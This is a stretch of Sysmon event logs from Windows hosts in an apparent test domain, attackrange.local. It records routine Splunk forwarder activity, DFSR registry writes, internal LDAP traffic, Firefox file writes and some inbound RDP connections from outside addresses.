10341000x80000000000000001049002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.131{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8974-6151-0E7A-00000000FC01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.099{5EBD8912-8974-6151-0E7A-00000000FC01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977602Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:57.828{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F3EF4F52D420A1C5E4F3225886882C,SHA256=250F3E318761096D684803C701AFD422F933D4EE8C8A2B1B98F799B690A96FD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:57.368{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=063E50F84545E867379FF2D0806BD403,SHA256=732B283B33286EB0EE25CEC3B1AB58E1EC064D858FA638A4C68DF6D9BF538503,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977601Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:54.931{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-34520-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977600Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:53.422{69CF5F33-7F27-614D-0B00-00000000FD01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-542.attackrange.local64586-false10.0.1.14-389- 23542300x8000000000000000977604Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:58.843{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C3AA5306B21D6AEC973BEFF4831EE6E,SHA256=D42B7593B64D429DDFCA56D2A2DFCF33C77AF2D0CC571510CA5B230024969D60,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.774{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53273-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:58.382{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25C76F31381105E87DB57B2C1D92A8CF,SHA256=DCA692D1609F0CDEBD681927F7A92AE6A3F6828F16D96767ED46D6650431AD4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977603Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:58.047{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D76B9460310FA082816EDCC43B4799E,SHA256=C697E5C391A3F0EB67CF84C6CB645F807F9C5A9C152EF3F1AA82E66D3062349F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977606Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:59.968{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD6DD7685DA4446A3A48FB499DFE3370,SHA256=DA1EE1639858EAE40CC666850B7B8B77964E6CF1640E2AF24208C863C27525EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977605Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:59.843{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B051FF3727A678E1861C3B67EFA382,SHA256=AE971698A12F6BCFA8C4DEA3D5C9C9CDE862AEEB4271154B6BC587DE69A7B9A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:59.653{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22372538F39E2F4FA016D7AF8121A124,SHA256=B74D31A563385FED29831689F38B3D83ADF9B6F3791F4CCA6BFDCCA09F4BE030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:59.516{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A5E4770E3B643A07ACF027EC058647,SHA256=F94FCFEA2CDD81BF81A1C6C70056AC9E2ECD4AD143CF7C994DDC64C8CD966F15,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977608Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:56.960{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-46620-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977607Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:00.859{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24C20BA74F06CDCF73DAB69D7516682A,SHA256=A31DBAC9A5636F1774865DE17004C7369A98BDF1510F7C90B3A9DC287D90A68B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:00.537{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=000AF7F8D1D420B81198E55C26AEE408,SHA256=F019EB6E0CE749C107D0FA81EAA0C25E2F152DBD041063407BF16A2B4F26FCB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:58.033{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60465-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000977610Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:01.859{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8F9FBFB55A03C47E8806F89897ACC7B,SHA256=1394FBD67724D60A7079D212E2B83E7792C57B4D84859324CC1C808ACD47ED2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.830{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.552{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C4AF9C94F7AE6EF909C91EA04FD0165,SHA256=A1DD02FBBA424DA3D7E3AAB04AC49357BA250F2A210413DFB73E1064F533B18F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977609Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:01.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CE60235CCA179FEA0E26E58A2ABE5FC,SHA256=9774C3A77DA3A13A8D0D5BEBB2C77D99BD8110E27F16C04A29FF0FEA3D6F3433,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.099{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=CFC2022072461F7DAB555B50898A3BB4,SHA256=A7BB26A1637BEFAAE6E03AF6FCE701E00A67EFFA7BA4140BE4EB555597761A48,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977614Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:59.986{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-58432-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977613Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:02.860{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64A56469175F6526095598F0DD65C1A9,SHA256=9F1B4CCDC15D1A80153B641CCAC2FBFFDC961FD5AC13620539A484764E3F127C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:02.567{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5142F2248739B33774CDD074A12F4452,SHA256=28ACCAE8E484EA6CB15675E1B5D1985A3C5EC0782FA79C713402B3DA6774EDCD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977612Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:58.816{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59312-false10.0.1.12-8000- 354300x8000000000000000977611Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:58.675{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-55147-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 13241300x80000000000000001049023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:06:02.282{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x80000000000000001049022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:06:02.267{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Config SourceDWORD (0x00000001) 13241300x80000000000000001049021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:06:02.267{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_C073BBA9-345E-4F58-AADF-98D983B75502.XML 23542300x8000000000000000977616Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:03.875{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D229DBC35C0AD18EB70C49D41837B0B,SHA256=52173F3ECAF41449A59F0E7E48828681CD84D197D1BFCB921C708AF71E6714DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:03.581{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2206261688DB4624354DA4E9F37772D6,SHA256=C61AA4E4E0D2BC686549A10FF42DE2AF42506BE0FE18EC131486F25117AD2BF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977615Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:03.438{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B4630456FD275BFC228A484D8DF66872,SHA256=F63A66CB21238070DC8E437BF07B3C289A7AEC20E9A7CFAE0EF095BC68F73793,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:03.313{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B11B4AA03F4F7A9E1C19AE819D0B720,SHA256=84CE54830FC0D047025E80D1F59678886E5E96D26CA307FF2592970021667747,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977618Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:04.891{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C1B0CB1C5BDE54D7BF430CA028C5607,SHA256=F0C719F9C9D338FCFC7F1EB41EDA99511E0B842CC27285A31F77BE93F11AAFA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:04.612{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193FC648567ED03CE8735FACEF362342,SHA256=CAE5AF65D053AEB0CFD9637D2C1526E9404921CA7B1E38E2997D7A8653FF094E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977617Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:00.780{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62859-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001049033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.991{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53277-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001049032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.991{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53277-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001049031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.979{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53276-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001049030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.979{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53276-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001049029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.960{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53275-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001049028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.960{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53275-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001049027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:01.921{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53274-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000977620Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:05.907{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB6FEA3FE2E946A01845710B42FA7A46,SHA256=343E4E50B14843E4D3A9339A7A4AB0B9DAD6C932AC92C24A29F8975859FD520F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:05.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C041E566C1A9444E79B390C78D3823FE,SHA256=A2FF67FC474143F7C759246B5414781D56AA8AB8A67F16C9BF9868CA7FFEAE30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977619Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:05.110{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CAEE3C49DF44F1E35A641DB4B8E7F7D,SHA256=568C15A04D0B4C25A213A75C937B1D36FA65CA87CC5E152E8F17D9F1929EDD7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:06.680{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=439D9A4254A58F7D5F1D1808A1C43347,SHA256=F2B8398A2083519E9F662F2AA556104D6118267815B94FA87FF31186EBEEE09C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977621Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:06.922{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B786EB4EEEAEA344D4FA36D0CACB55FD,SHA256=21763B2EE656E62A946C2393CA5B99966DC6D8A02B53840212D432AE2A334F2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977624Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:07.938{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4EFE42FB77D0F6DA1D90FD0A597A433,SHA256=300AA9E600A8DE3233B5F6D19CC35A72B2603CE8D657D03F16CB14E4DD97BDEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049037Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:06:07.711{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708C99A19525AE00AB829C31DDC9C8BA,SHA256=BDE09E9FA7B4C2F9C041081261DF76EB52AE9AC7E72D553DDC65B9782468300A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977623Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:04.149{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-29169-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977622Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:06:07.282{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=664775F433A71F60D845DD8500182D8D,SHA256=6A8C6D9BA79D9CFEE0C6D5D5612DC9C998E623C37ACB34CA3F964B1A676DB1DA,IMPHASH=00000000000000000000000000000000falsetrue 